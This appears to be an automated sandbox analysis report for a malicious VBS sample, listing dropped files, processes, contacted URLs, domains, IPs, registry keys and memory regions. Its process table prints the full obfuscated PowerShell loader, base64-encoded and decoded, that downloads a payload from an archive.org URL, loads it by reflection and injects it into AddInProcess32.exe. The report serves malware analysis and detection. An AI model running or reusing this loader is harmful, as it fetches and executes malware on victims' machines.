Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
1iH5ABLKIA.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4c1vj0if.ura.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aautp4qn.m2t.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwhtzndv.3q1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5lhbtdz.hqo.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1iH5ABLKIA.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+'
= (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent =
'+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type
= 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+',
[object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39)
)"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/AaTNM/0
|
188.114.96.3
|
|
|
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtve5;9jDbase64Content
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://ia600100.us.arX
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
There are 21 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.96.3
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
148.113.165.11
|
unknown
|
United States
|
|
|
|
188.114.96.3
|
paste.ee
|
European Union
|
|
|
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
|
Version
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
2198F4E4000
|
trusted library allocation
|
page read and write
|
|
|
|
2811000
|
trusted library allocation
|
page read and write
|
|
|
|
219A7700000
|
trusted library section
|
page read and write
|
|
|
|
2199F4DC000
|
trusted library allocation
|
page read and write
|
|
|
|
2295CF3E000
|
heap
|
page read and write
|
||
|
B1C000
|
heap
|
page read and write
|
||
|
7FFD34766000
|
trusted library allocation
|
page execute and read and write
|
||
|
28A1000
|
trusted library allocation
|
page read and write
|
||
|
2295D397000
|
heap
|
page read and write
|
||
|
5750000
|
trusted library allocation
|
page read and write
|
||
|
2878000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
|
EE05C7E000
|
stack
|
page read and write
|
||
|
7FFD34684000
|
trusted library allocation
|
page read and write
|
||
|
4DB6000
|
heap
|
page read and write
|
||
|
2295CF6F000
|
heap
|
page read and write
|
||
|
A96000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page execute and read and write
|
||
|
EE05943000
|
stack
|
page read and write
|
||
|
28B7000
|
trusted library allocation
|
page read and write
|
||
|
2295B58B000
|
heap
|
page read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34822000
|
trusted library allocation
|
page read and write
|
||
|
2014EEEF000
|
heap
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A08000
|
trusted library allocation
|
page read and write
|
||
|
EE05EFE000
|
stack
|
page read and write
|
||
|
5525000
|
trusted library allocation
|
page read and write
|
||
|
219A7000000
|
heap
|
page read and write
|
||
|
BC1000
|
heap
|
page read and write
|
||
|
2198D030000
|
heap
|
page read and write
|
||
|
7FFD34740000
|
trusted library allocation
|
page execute and read and write
|
||
|
59EC000
|
stack
|
page read and write
|
||
|
219A7697000
|
heap
|
page read and write
|
||
|
B0B000
|
heap
|
page read and write
|
||
|
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34870000
|
trusted library allocation
|
page execute and read and write
|
||
|
2198EEB0000
|
heap
|
page execute and read and write
|
||
|
2198D074000
|
heap
|
page read and write
|
||
|
2198D200000
|
heap
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
DA0000
|
heap
|
page read and write
|
||
|
276E000
|
stack
|
page read and write
|
||
|
9EA9DFE000
|
stack
|
page read and write
|
||
|
2295CEF1000
|
heap
|
page read and write
|
||
|
219A6ECE000
|
heap
|
page read and write
|
||
|
219907D4000
|
trusted library allocation
|
page read and write
|
||
|
201514C9000
|
trusted library allocation
|
page read and write
|
||
|
2295B58B000
|
heap
|
page read and write
|
||
|
7FFD34736000
|
trusted library allocation
|
page read and write
|
||
|
EE060B8000
|
stack
|
page read and write
|
||
|
2295D330000
|
heap
|
page read and write
|
||
|
4EB0000
|
heap
|
page read and write
|
||
|
49AE000
|
stack
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
|
4827D43000
|
stack
|
page read and write
|
||
|
219905C0000
|
trusted library allocation
|
page read and write
|
||
|
219A76F3000
|
heap
|
page read and write
|
||
|
2295B5B9000
|
heap
|
page read and write
|
||
|
EE06D8E000
|
stack
|
page read and write
|
||
|
3811000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
|
219A7611000
|
heap
|
page read and write
|
||
|
48285BE000
|
stack
|
page read and write
|
||
|
ABB000
|
trusted library allocation
|
page execute and read and write
|
||
|
53AD000
|
stack
|
page read and write
|
||
|
EE061BF000
|
stack
|
page read and write
|
||
|
2198D1C0000
|
trusted library allocation
|
page read and write
|
||
|
2198D2A0000
|
heap
|
page read and write
|
||
|
58AE000
|
stack
|
page read and write
|
||
|
3817000
|
trusted library allocation
|
page read and write
|
||
|
EE05FBF000
|
stack
|
page read and write
|
||
|
20150AD0000
|
heap
|
page read and write
|
||
|
2295CF6E000
|
heap
|
page read and write
|
||
|
2295CF6E000
|
heap
|
page read and write
|
||
|
2198D204000
|
heap
|
page read and write
|
||
|
2295B540000
|
heap
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
201513F8000
|
trusted library allocation
|
page read and write
|
||
|
2295CEE2000
|
heap
|
page read and write
|
||
|
2014EF77000
|
heap
|
page read and write
|
||
|
9EA96FE000
|
stack
|
page read and write
|
||
|
2199EED0000
|
trusted library allocation
|
page read and write
|
||
|
2295B57E000
|
heap
|
page read and write
|
||
|
20151535000
|
trusted library allocation
|
page read and write
|
||
|
8F8000
|
stack
|
page read and write
|
||
|
4D90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page execute and read and write
|
||
|
2871000
|
trusted library allocation
|
page read and write
|
||
|
48286BE000
|
stack
|
page read and write
|
||
|
2295CEEA000
|
heap
|
page read and write
|
||
|
628D000
|
stack
|
page read and write
|
||
|
2295CF6E000
|
heap
|
page read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
|
2295CEE1000
|
heap
|
page read and write
|
||
|
2295B5EB000
|
heap
|
page read and write
|
||
|
4E20000
|
heap
|
page read and write
|
||
|
A80000
|
trusted library allocation
|
page read and write
|
||
|
5530000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34684000
|
trusted library allocation
|
page read and write
|
||
|
20150E20000
|
heap
|
page read and write
|
||
|
2014F170000
|
heap
|
page read and write
|
||
|
2295B510000
|
heap
|
page read and write
|
||
|
2295CEE9000
|
heap
|
page read and write
|
||
|
4E04000
|
heap
|
page read and write
|
||
|
7FFD34870000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
|
2295D37B000
|
heap
|
page read and write
|
||
|
20151118000
|
trusted library allocation
|
page read and write
|
||
|
219A7621000
|
heap
|
page read and write
|
||
|
2295CF12000
|
heap
|
page read and write
|
||
|
D70000
|
trusted library allocation
|
page read and write
|
||
|
201514F4000
|
trusted library allocation
|
page read and write
|
||
|
A92000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34862000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
20169142000
|
heap
|
page read and write
|
||
|
201514A2000
|
trusted library allocation
|
page read and write
|
||
|
A7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
AE0000
|
heap
|
page read and write
|
||
|
EE0613D000
|
stack
|
page read and write
|
||
|
2198F0E2000
|
trusted library allocation
|
page read and write
|
||
|
2295B5CD000
|
heap
|
page read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
|
2198F307000
|
trusted library allocation
|
page read and write
|
||
|
AE8000
|
heap
|
page read and write
|
||
|
2295CF6E000
|
heap
|
page read and write
|
||
|
2198D004000
|
heap
|
page read and write
|
||
|
9EA98FF000
|
stack
|
page read and write
|
||
|
5740000
|
heap
|
page read and write
|
||
|
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
|
21990B77000
|
trusted library allocation
|
page read and write
|
||
|
2198D1F0000
|
heap
|
page readonly
|
||
|
5B2E000
|
stack
|
page read and write
|
||
|
7FFD3469B000
|
trusted library allocation
|
page read and write
|
||
|
28AF000
|
trusted library allocation
|
page read and write
|
||
|
2014EEFD000
|
heap
|
page read and write
|
||
|
20151112000
|
trusted library allocation
|
page read and write
|
||
|
5B6E000
|
stack
|
page read and write
|
||
|
51AF000
|
stack
|
page read and write
|
||
|
2295CF22000
|
heap
|
page read and write
|
||
|
2198D206000
|
heap
|
page read and write
|
||
|
4DEB000
|
heap
|
page read and write
|
||
|
2295CFC7000
|
heap
|
page read and write
|
||
|
2199F1AE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
2295CF06000
|
heap
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
|
219A7110000
|
heap
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
54F4000
|
trusted library allocation
|
page read and write
|
||
|
EE059CD000
|
stack
|
page read and write
|
||
|
2295B5CA000
|
heap
|
page read and write
|
||
|
219A76EB000
|
heap
|
page read and write
|
||
|
2198D242000
|
trusted library allocation
|
page read and write
|
||
|
52C000
|
stack
|
page read and write
|
||
|
2198F2B9000
|
trusted library allocation
|
page read and write
|
||
|
5516000
|
trusted library allocation
|
page read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
2295CEE9000
|
heap
|
page read and write
|
||
|
62CE000
|
stack
|
page read and write
|
||
|
2295CF0E000
|
heap
|
page read and write
|
||
|
20161001000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34831000
|
trusted library allocation
|
page read and write
|
||
|
48287BE000
|
stack
|
page read and write
|
||
|
9EA9BFE000
|
stack
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
|
20169157000
|
heap
|
page read and write
|
||
|
2015106E000
|
trusted library allocation
|
page read and write
|
||
|
2295CF01000
|
heap
|
page read and write
|
||
|
21990B7B000
|
trusted library allocation
|
page read and write
|
||
|
28A5000
|
trusted library allocation
|
page read and write
|
||
|
A90000
|
trusted library allocation
|
page read and write
|
||
|
A30000
|
heap
|
page read and write
|
||
|
2295CF6E000
|
heap
|
page read and write
|
||
|
7EE50000
|
trusted library allocation
|
page execute and read and write
|
||
|
219A7600000
|
heap
|
page read and write
|
||
|
2295CF27000
|
heap
|
page read and write
|
||
|
48282FE000
|
stack
|
page read and write
|
||
|
2014F100000
|
trusted library allocation
|
page read and write
|
||
|
2014F175000
|
heap
|
page read and write
|
||
|
2198D280000
|
trusted library allocation
|
page read and write
|
||
|
2295B5EB000
|
heap
|
page read and write
|
||
|
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
|
4D99000
|
trusted library allocation
|
page read and write
|
||
|
2295B5C8000
|
heap
|
page read and write
|
||
|
20161072000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21990598000
|
trusted library allocation
|
page read and write
|
||
|
219A767F000
|
heap
|
page read and write
|
||
|
20169100000
|
heap
|
page read and write
|
||
|
2014EF0F000
|
heap
|
page read and write
|
||
|
2198EE17000
|
heap
|
page execute and read and write
|
||
|
D1E000
|
stack
|
page read and write
|
||
|
2295CF6E000
|
heap
|
page read and write
|
||
|
4D9B000
|
trusted library allocation
|
page read and write
|
||
|
B8C000
|
heap
|
page read and write
|
||
|
9EA95FE000
|
stack
|
page read and write
|
||
|
20150EDE000
|
heap
|
page read and write
|
||
|
20150E72000
|
heap
|
page read and write
|
||
|
2198CFF0000
|
heap
|
page read and write
|
||
|
482837E000
|
stack
|
page read and write
|
||
|
586E000
|
stack
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
|
572E000
|
stack
|
page read and write
|
||
|
2014EDD0000
|
heap
|
page read and write
|
||
|
7FFD34982000
|
trusted library allocation
|
page read and write
|
||
|
20150FF0000
|
heap
|
page read and write
|
||
|
7FFD3473C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
|
482863F000
|
stack
|
page read and write
|
||
|
2295CEE3000
|
heap
|
page read and write
|
||
|
21990282000
|
trusted library allocation
|
page read and write
|
||
|
2848000
|
trusted library allocation
|
page read and write
|
||
|
2295B53B000
|
heap
|
page read and write
|
||
|
2295CEFE000
|
heap
|
page read and write
|
||
|
2199082F000
|
trusted library allocation
|
page read and write
|
||
|
20161010000
|
trusted library allocation
|
page read and write
|
||
|
2014F070000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
2295CEE2000
|
heap
|
page read and write
|
||
|
A73000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
|
285F000
|
trusted library allocation
|
page read and write
|
||
|
2198F2B5000
|
trusted library allocation
|
page read and write
|
||
|
D5C000
|
stack
|
page read and write
|
||
|
2295B54F000
|
heap
|
page read and write
|
||
|
21990574000
|
trusted library allocation
|
page read and write
|
||
|
20151001000
|
trusted library allocation
|
page read and write
|
||
|
2014EEF9000
|
heap
|
page read and write
|
||
|
2295CF6E000
|
heap
|
page read and write
|
||
|
20169020000
|
heap
|
page read and write
|
||
|
20151120000
|
trusted library allocation
|
page read and write
|
||
|
2198D1E0000
|
trusted library allocation
|
page read and write
|
||
|
2198D2C0000
|
heap
|
page read and write
|
||
|
2198D240000
|
trusted library allocation
|
page read and write
|
||
|
EE05F79000
|
stack
|
page read and write
|
||
|
2198EEC1000
|
trusted library allocation
|
page read and write
|
||
|
4DB0000
|
heap
|
page read and write
|
||
|
2199058B000
|
trusted library allocation
|
page read and write
|
||
|
B19000
|
heap
|
page read and write
|
||
|
7FFD34A13000
|
trusted library allocation
|
page read and write
|
||
|
2198EF42000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34682000
|
trusted library allocation
|
page read and write
|
||
|
EE05D7D000
|
stack
|
page read and write
|
||
|
2198F4BC000
|
trusted library allocation
|
page read and write
|
||
|
2295B5EB000
|
heap
|
page read and write
|
||
|
4818000
|
trusted library allocation
|
page read and write
|
||
|
2014EF81000
|
heap
|
page read and write
|
||
|
4DBD000
|
heap
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
|
2295B522000
|
heap
|
page read and write
|
||
|
A74000
|
trusted library allocation
|
page read and write
|
||
|
2015101B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
|
2876000
|
trusted library allocation
|
page read and write
|
||
|
2014EFB0000
|
heap
|
page read and write
|
||
|
4D2E000
|
stack
|
page read and write
|
||
|
2295D331000
|
heap
|
page read and write
|
||
|
2295CF6F000
|
heap
|
page read and write
|
||
|
2295CF6E000
|
heap
|
page read and write
|
||
|
2295CF32000
|
heap
|
page read and write
|
||
|
4F26000
|
heap
|
page read and write
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
|
2295CF37000
|
heap
|
page read and write
|
||
|
20151123000
|
trusted library allocation
|
page read and write
|
||
|
2199EF33000
|
trusted library allocation
|
page read and write
|
||
|
2198CF70000
|
heap
|
page read and write
|
||
|
2295B518000
|
heap
|
page read and write
|
||
|
2873000
|
trusted library allocation
|
page read and write
|
||
|
A9A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD349F1000
|
trusted library allocation
|
page read and write
|
||
|
482807E000
|
stack
|
page read and write
|
||
|
2198CFB0000
|
heap
|
page read and write
|
||
|
4DA0000
|
heap
|
page execute and read and write
|
||
|
4DFC000
|
heap
|
page read and write
|
||
|
2198F2A6000
|
trusted library allocation
|
page read and write
|
||
|
219907A9000
|
trusted library allocation
|
page read and write
|
||
|
9EA94FA000
|
stack
|
page read and write
|
||
|
2015109D000
|
trusted library allocation
|
page read and write
|
||
|
A60000
|
trusted library allocation
|
page read and write
|
||
|
289C000
|
trusted library allocation
|
page read and write
|
||
|
52AD000
|
stack
|
page read and write
|
||
|
2295CF43000
|
heap
|
page read and write
|
||
|
482853C000
|
stack
|
page read and write
|
||
|
2295CF6E000
|
heap
|
page read and write
|
||
|
2295CF71000
|
heap
|
page read and write
|
||
|
2861000
|
trusted library allocation
|
page read and write
|
||
|
2199009B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
|
D60000
|
trusted library allocation
|
page execute and read and write
|
||
|
AD0000
|
trusted library allocation
|
page read and write
|
||
|
20151324000
|
trusted library allocation
|
page read and write
|
||
|
DC0000
|
heap
|
page read and write
|
||
|
2295CF2B000
|
heap
|
page read and write
|
||
|
EE05E7E000
|
stack
|
page read and write
|
||
|
2800000
|
heap
|
page execute and read and write
|
||
|
2199EEC1000
|
trusted library allocation
|
page read and write
|
||
|
2014EEF5000
|
heap
|
page read and write
|
||
|
2295B5D0000
|
heap
|
page read and write
|
||
|
219A7182000
|
heap
|
page read and write
|
||
|
20150E32000
|
heap
|
page read and write
|
||
|
7FFD3469C000
|
trusted library allocation
|
page read and write
|
||
|
2198EE10000
|
heap
|
page execute and read and write
|
||
|
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
|
2198F2B1000
|
trusted library allocation
|
page read and write
|
||
|
219A7695000
|
heap
|
page read and write
|
||
|
20150ED1000
|
heap
|
page read and write
|
||
|
20150AB0000
|
heap
|
page execute and read and write
|
||
|
20151602000
|
trusted library allocation
|
page read and write
|
||
|
D90000
|
trusted library allocation
|
page read and write
|
||
|
2199091E000
|
trusted library allocation
|
page read and write
|
||
|
2198F537000
|
trusted library allocation
|
page read and write
|
||
|
2198F2A8000
|
trusted library allocation
|
page read and write
|
||
|
2295B53A000
|
heap
|
page read and write
|
||
|
286D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34766000
|
trusted library allocation
|
page execute and read and write
|
||
|
EE063BB000
|
stack
|
page read and write
|
||
|
20169114000
|
heap
|
page read and write
|
||
|
2295B5C3000
|
heap
|
page read and write
|
||
|
2295B330000
|
heap
|
page read and write
|
||
|
4D6D000
|
stack
|
page read and write
|
||
|
284D000
|
trusted library allocation
|
page read and write
|
||
|
2863000
|
trusted library allocation
|
page read and write
|
||
|
20150ED6000
|
heap
|
page read and write
|
||
|
2198D02C000
|
heap
|
page read and write
|
||
|
2295CF32000
|
heap
|
page read and write
|
||
|
5504000
|
trusted library allocation
|
page read and write
|
||
|
D97000
|
trusted library allocation
|
page read and write
|
||
|
7DF47A4E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5519000
|
trusted library allocation
|
page read and write
|
||
|
2014F120000
|
heap
|
page execute and read and write
|
||
|
2295B430000
|
heap
|
page read and write
|
||
|
219A768F000
|
heap
|
page read and write
|
||
|
EE05DFE000
|
stack
|
page read and write
|
||
|
20151115000
|
trusted library allocation
|
page read and write
|
||
|
219A70F0000
|
heap
|
page execute and read and write
|
||
|
20150AD6000
|
heap
|
page read and write
|
||
|
A70000
|
trusted library allocation
|
page read and write
|
||
|
EE06E0D000
|
stack
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page execute and read and write
|
||
|
2295D37A000
|
heap
|
page read and write
|
||
|
AA0000
|
heap
|
page read and write
|
||
|
482883B000
|
stack
|
page read and write
|
||
|
482827E000
|
stack
|
page read and write
|
||
|
EE0633E000
|
stack
|
page read and write
|
||
|
2015115C000
|
trusted library allocation
|
page read and write
|
||
|
219A7163000
|
heap
|
page read and write
|
||
|
7FFD34862000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34683000
|
trusted library allocation
|
page execute and read and write
|
||
|
2295B53F000
|
heap
|
page read and write
|
||
|
2295CF10000
|
heap
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
